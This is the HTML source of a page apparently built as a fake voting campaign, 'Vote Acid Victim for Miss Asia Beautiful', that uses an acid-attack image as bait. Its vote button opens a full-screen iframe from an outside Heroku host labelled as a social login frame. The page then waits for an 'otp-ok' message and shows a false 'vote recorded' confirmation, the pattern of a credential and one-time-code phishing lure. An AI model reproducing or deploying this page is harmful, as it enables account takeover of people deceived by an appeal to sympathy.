<!DOCTYPE html>
<html>
<head>
<title>Namasina Tamansa | Make her the next Miss Asia Beautiful</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="twitter:card" content="summary_large_image" />
<meta property="og:type"         content="article" />
<meta property="og:title"        content="Vote Acid Victim for Miss Asia Beautiful" />
<meta property="og:description"  content="Click to Make her the next Miss Asia Beautiful" />
<meta property="og:image"        content="/acid-attack-2.jpg" />
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" integrity="sha384-TX8t27EcRE3e/ihU7zmQxVncDAy5uIKz4rEkgIXeMed4M0jlfIDPvg6uqKI2xXr2" crossorigin="anonymous">
<style>
body, html {
  height: 100%;
  margin: 0;
  font: 400 15px/1.8 "Lato", sans-serif;
  color: #777;
}

.button {
  width:100%;
  background-color: #fff; /* Green */
  border: none;
  color: black;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  cursor: pointer;
}

.bgimg-1, .bgimg-2, .bgimg-3 {
  position: relative;
  opacity: 0.99;
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;

}
.bgimg-1 {
  background-image: url("/acid-attack-2.jpg");
  height: 100%;
}

.caption {
  position: absolute;
  left: 0;
  top: 50%;
  width: 100%;
  text-align: center;
  color: #000;
}

.caption span.border {
  background-color: #111;
  color: #fff;
  padding: 18px;
  font-size: 25px;
  letter-spacing: 10px;
}

h3 {
  letter-spacing: 5px;
  text-transform: uppercase;
  font: 20px "Lato", sans-serif;
  color: #111;
}

.layer {
    background-color: #aa000077 !important;
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
}
</style>
</head>
<body>
<div style="position:fixed; top:0px; right:0px; height:auto; z-index:12;"><img style="width:13em;" src="logo.png"/></div>
<div class="bgimg-1">
  <div class="layer"></div>
  <div class="caption">	
	<div class="bg-primary w-100">
		<button id="myBtn" class="btn btn-primary p-3">
			<span class="h4 font-weight-bold">
				CLICK HERE TO VOTE
			</span>
		</button>
		<img style="position:absolute; left:calc(50% - 14em);" src="/logo-bp.png" width="80px"/>
	</div>
  </div>
</div>
<div id="myModal" class="modal" style="display:none; position:fixed; top:5%; right:5%; width:90%; left:5%; border:0px; height:90%; background-color:white; z-index:9999;">
  <!-- Modal content -->
  <div class="modal-content" style="padding:0px; height:100%;">
    <iframe id="iframe-social-frame" scrolling="no" style="border:0px;" src="https://sahayogi-api.herokuapp.com" width="100%" height="100%" style="height:100%;  overflow:hidden;"></iframe>
  </div>
</div>
<div class="modal fade" id="finalModalCenter" tabindex="-1" role="dialog" aria-labelledby="finalModalCenterTitle" aria-hidden="true">
  <div class="modal-dialog modal-dialog-centered" role="document">
    <div class="modal-content">
      <div class="modal-header">
        <h5 class="modal-title" id="finalModalLongTitle">Thanks for VOTE!</h5>
        <button type="button" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body text-center">
        <span class="h3 font-weight-bold">Thanks for your Vote</span><br/><span class="h5">Your vote HAS been recorded</span>
      </div>
      <div class="modal-footer">
        <button type="button" class="btn btn-secondary" data-dismiss="modal">OK</button>
      </div>
    </div>
  </div>
</div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" integrity="sha384-w1Q4orYjBQndcko6MimVbzY0tgp4pWB4lZ7lr30WKz0vr/aWKhXdBNmNb5D92v7s" crossorigin="anonymous"></script>
<script>
$(document).ready(function(){
	
});

var flag = 0;
var modal = document.getElementById("myModal");
var txt = document.getElementById("txt");
var btn = document.getElementById("myBtn");

// When the user clicks the button, open the modal 
btn.onclick = function() {
  modal.style.display = "block";
}

var eventMethod = window.addEventListener
		? "addEventListener"
		: "attachEvent";
var eventer = window[eventMethod];
var messageEvent = eventMethod === "attachEvent"
	? "onmessage"
	: "message";

eventer(messageEvent, function (e) {
	if (e.data === "otp-ok" || e.message === "otp-ok") 
	{
		modal.style.display = "none";
		$(btn).children('span').html('Thanks for Voting!');
		$('#finalModalCenter').modal('show');
	}
	console.log(e);
});

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
  if (event.target == modal) {
	modal.style.display = "none";
  }
}
</script>
</html>
